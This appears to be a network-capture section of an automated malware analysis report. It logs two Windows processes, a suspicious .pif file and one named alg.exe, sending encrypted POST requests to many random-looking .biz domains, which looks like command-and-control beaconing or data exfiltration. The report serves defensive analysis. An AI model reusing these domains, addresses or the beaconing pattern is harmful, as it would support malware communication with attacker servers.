Data Ascii: F%&l>/.=MDoO!4n,#;Lm6l0B6T@D2i0z,h$=Z^w`*&Ikjl^y9;)aQBR+Fe&Uf]e:u+]_+<_CUXutR}.x2db`Z:Dv_Dyf21$"
Nov 1, 2024 08:24:41.074980021 CET  413                IN         HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=052543000529ebdc737d6603776f83d0|173.254.250.82|1730445880|1730445880|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        111192.168.2.84988244.221.84.105804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.128283024 CET353OUTPOST /cdrlubbsf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.128283024 CET802OUTData Raw: b5 a4 31 2e 3c 32 5b 6f 16 03 00 00 81 03 c4 6c 52 f9 c2 bf b1 58 46 aa 98 70 70 a8 b3 dc 46 56 ea 36 e6 c2 69 b6 a6 68 17 9b 97 e1 5f cf ba 40 45 ae ab ae d3 b5 86 dc bd 82 54 52 3c 45 38 c9 59 f9 a4 88 b5 f8 f3 f3 3c 5e 9c 6c a0 c0 fe 1f d9 a6
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1.<2[olRXFppFV6ih_@ETR<E8Y<^l7:G"pEW@wF$u6F3p&U_HjM;"{l:LV)?0jQp?k!=)ORWI4{#x=\*u`DtGlD1s+
Nov 1, 2024 08:24:41.821480989 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b61783641f357b0487d68ea8d0ccd3de|173.254.250.82|1730445881|1730445881|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.8 | 49883 | 3.254.94.185 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:41.274975061 CET | 348 | OUT | POST /qmfujjy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: brsua.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:41.275019884 CET | 778 | OUT | Data Raw: e4 e7 5a b8 ec 14 3f 0a fe 02 00 00 5e 09 ca 00 9d 5b eb aa 33 1f b3 89 5e 4a 8b 3a a2 15 4a 47 51 89 b2 80 46 ed 67 03 2a 21 36 fb c1 9c 0a f5 85 e4 62 d6 b9 1d e2 71 b7 33 da dc 65 f5 1a 5f f7 c3 5d 55 94 b7 5c ac 96 51 50 6d ed b4 7b bc 8c 37
Nov 1, 2024 08:24:42.247014999 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4d2b77a791edd6d1c1fef6fd9f1979e8|173.254.250.82|1730445882|1730445882|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.8 | 49888 | 54.244.188.177 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:41.876946926 CET | 347 | OUT | POST /dxlhs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:41.876962900 CET | 802 | OUT | Data Raw: 03 65 9d cc eb f9 38 32 16 03 00 00 97 d3 1c e0 af d2 c7 73 cb f8 ba 6b de 3e 3b 2d 51 4e dd 00 1d 48 e1 70 cb 3d f0 8a b5 05 35 95 4f 9e 53 b6 f6 8c b6 d5 2b 8e 2d 56 fc 2c 96 bd 36 84 0a 43 09 06 83 a9 40 c7 e8 05 9d ff 21 0e 13 e6 6d 98 2e 15
Nov 1, 2024 08:24:42.800913095 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2b1754f0b5645cc6831f86c0d7b9bc35|173.254.250.82|1730445882|1730445882|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.8 | 49891 | 85.214.228.140 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:42.444330931 CET | 359 | OUT | POST /rgkgvuyxljjatio HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dlynankz.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:42.444366932 CET | 778 | OUT | Data Raw: 22 db 20 73 c6 de 90 f6 fe 02 00 00 a1 fc ed 83 8d 28 49 50 0b 44 7f f5 93 72 4a 39 aa b4 dd 13 5c f3 a2 5d 7c 06 f9 02 03 ea 9e 39 ed d6 77 d9 4a bb cc cd 7d 1a 3e 9c 25 e7 3a 43 ab ac 10 38 7b c1 1b f2 44 cc 89 af 53 0c fe 7f 01 52 db f9 5a 3c
Nov 1, 2024 08:24:43.306997061 CET | 161 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Fri, 01 Nov 2024 07:24:43 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Nov 1, 2024 08:24:43.307116032 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.8 | 49895 | 3.254.94.185 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:42.854652882 CET | 343 | OUT | POST /ki HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:42.854671001 CET | 802 | OUT | Data Raw: fc f4 93 cc cf ed 92 57 16 03 00 00 75 8b 7d 96 47 8f 50 19 08 cb 6e cb 1e ed 05 2a c3 aa 9d 40 af a8 65 b7 8c c6 50 74 0f cf e5 c3 3c a9 a8 17 ad 0d 35 78 5b 4b ed 30 e7 88 29 86 c9 00 20 51 32 80 fc 27 0a 8f 72 2e 53 fc 7e 29 39 42 1a 34 6d b8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Wu}GPn*@ePt<5x[K0) Q2'r.S~)9B4mAT|qoC}j"`Pp\";D|*V]pX"Ev(hjk{q^h|Ybcm#VUN!3[!mgT?pD`qrHS
Nov 1, 2024 08:24:43.842029095 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b4e8f90de47da1766fe3ec07d5925f96|173.254.250.82|1730445883|1730445883|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.8 | 49900 | 47.129.31.212 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:43.486875057 CET | 345 | OUT | POST /bq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:43.487070084 CET | 778 | OUT | Data Raw: c6 93 61 84 ea f8 f9 a7 fe 02 00 00 86 a0 19 35 db a0 2f ae ad 1e 76 8d 30 16 89 53 24 3b 8a 04 2d 6e 70 13 96 c9 4d 16 c9 87 53 d2 35 89 34 0b 24 58 cf c4 1d 8b 69 01 ae c8 1d 2e 9c f6 df 57 cf 0e fa 21 e4 90 2f 19 e9 35 ff 1b 88 e7 e6 1c 4f bf
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a5/v0S$;-npMS54$Xi.W!/5OP57utELT%1V{<{<<G>{]W{hycy0 _82XT%VSu:lf)b.T*0|MO_X#=Sw|n{j6)`!
Nov 1, 2024 08:24:44.950238943 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ea7f26f393ef50c8c574b69060f3bfbb|173.254.250.82|1730445884|1730445884|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.8 | 49902 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:43.899763107 CET | 360 | OUT | POST /vhecjxbkixjuljyp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:43.899786949 CET | 802 | OUT | Data Raw: e5 67 01 41 06 1d d4 29 16 03 00 00 93 76 b2 3e a9 aa 16 b5 79 cf 5b a5 4d 2f 6a 29 49 08 8b 99 6b c3 b9 01 b8 de fa 4b ae 96 c3 7a 3c c8 f3 5a 2f c1 96 c2 c4 d1 be bf 27 6a 4a 2d 0b d6 a3 c7 7c 36 98 51 cc ab a1 df a5 b3 a7 b5 0b 81 c7 e0 80 e2
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: gA)v>y[M/j)IkKz<Z/'jJ-|6QzEAn<9>a&1G6 ('f>@sf+ "Y;U*d?IoC{DN_} 'h:*(nc7H`*Ek3GR(GoN;|9XcsF_NDn
Nov 1, 2024 08:24:45.328772068 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dd5477077425b53d220a696663d421db|173.254.250.82|1730445885|1730445885|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.8 | 49912 | 34.246.200.160 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:45.392642021 CET | 355 | OUT | POST /cgkctkdxtvumt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:45.392669916 CET | 802 | OUT | Data Raw: 88 ff ea e4 b2 48 f5 50 16 03 00 00 7b 74 d0 7a 25 f4 88 b4 b9 a3 ed b7 1d 88 20 83 14 8f 54 56 42 d0 cf 97 40 40 15 eb f3 a7 98 35 e6 18 2b 9d 22 1e 45 5f f3 7f 2e 6c e2 0b c6 4d e0 16 cc 0d a7 64 70 62 75 28 ee 29 cf e0 15 5f 57 87 77 d1 76 dd
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: HP{tz% TVB@@5+"E_.lMdpbu()_Wwvx"1U,`?t.=bgbQZIUOk)ucAk%e_+?H =-+|jsla|}HM7&6l1-UO?%{Z3xIgP9{
Nov 1, 2024 08:24:46.357059002 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=cf417fce9c2b360d5f08719d4d55f4a0|173.254.250.82|1730445886|1730445886|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.8 | 49913 | 34.211.97.45 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:45.410393000 CET | 357 | OUT | POST /nmqrslobvguxfrkm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:45.410423040 CET | 778 | OUT | Data Raw: 95 00 98 3c 3e da cd 93 fe 02 00 00 96 4a 5c 89 f6 52 8c c7 84 16 29 aa 40 97 30 db a8 fd 9c ef d2 4a 68 e6 a9 7a 49 f1 a8 62 91 81 09 ad 61 03 8f 2e d1 23 55 1e b3 55 84 8c 99 5d 3d a3 fd e8 22 81 b2 1d f1 f8 cb b7 ca 77 9e ff 32 7c 9e 1b 6f 9b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <>J\R)@0JhzIba.#UU]="w2|oj?XcST3rrRTT}Qk,%u?J)A2-bjD3ySp<*#UbfMYT]8.Kzn\RMAn5&vkvTnh
Nov 1, 2024 08:24:46.298280954 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=c594b70995f3bd9af54585365a284752|173.254.250.82|1730445886|1730445886|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.8 | 49919 | 47.129.31.212 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:46.414691925 CET | 353 | OUT | POST /esgffqvf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:46.414838076 CET | 802 | OUT | Data Raw: e5 15 42 b2 e7 68 76 ca 16 03 00 00 ef b1 69 51 bd 9e a3 2b 65 a7 43 d3 c2 a3 0d bd b0 9d 0d e5 d3 d6 0a a3 5e 74 90 8a eb 29 8a b5 bf 05 4d f1 04 44 bd d1 08 be 48 38 04 16 b3 ff 24 78 36 b3 53 b0 a0 89 e7 56 d7 c8 3c 59 53 9e ee 87 59 b4 ec b6
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: BhviQ+eC^t)MDH8$x6SV<YSY1&{|uH+T:)kmp;g+QuZ^X\R|h8up~;sVrU@mI%gy| /o3'Wo&Z:V7E-7M
Nov 1, 2024 08:24:47.873754978 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=86f91e0ce0e364c3d12aa05e351fcaf5|173.254.250.82|1730445887|1730445887|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.8 | 49920 | 47.129.31.212 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:46.493212938 CET | 352 | OUT | POST /eviqjrwjsc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:47.961424112 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5db6436a254bba99f8e92f4fd786394f|173.254.250.82|1730445887|1730445887|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.8 | 49930 | 3.94.10.34 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:47.945707083 CET | 351 | OUT | POST /xyrpanl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:48.608784914 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fae0247717672aee1c1c31272378237e|173.254.250.82|1730445888|1730445888|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.8 | 49932 | 18.208.156.248 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:48.240483999 CET | 355 | OUT | POST /aoayitmlcu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:48.912839890 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=366c8ab7eacc65c11dd69709049f8486|173.254.250.82|1730445888|1730445888|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.8 | 49937 | 35.164.78.200 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:48.723855972 CET | 354 | OUT | POST /ceercoregt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:48.723880053 CET | 802 | OUT | Data Raw: c7 ca 69 46 73 ce 8b 9c 16 03 00 00 d9 4f 6a 4f 8f 6b da 6b 66 8c bc d2 04 c8 a3 e8 46 05 7d 07 1e 72 2e 14 90 bd 98 a9 cd de f5 23 a2 f2 ab 4c 18 07 62 2b 7a d3 e4 13 7b 27 90 4e 69 59 0a 9b c0 73 68 f9 33 9d d2 d3 28 c9 dc 73 78 4a 94 21 10 87
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: iFsOjOkkfF}r.#Lb+z{'NiYsh3(sxJ!M*RYA1j`z@?xs1m*ZCoO7Nq"Ju2$2"D60SYbzjCI30B9ZyPQMr]Te)KSKo
Nov 1, 2024 08:24:49.855303049 CET | 416 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
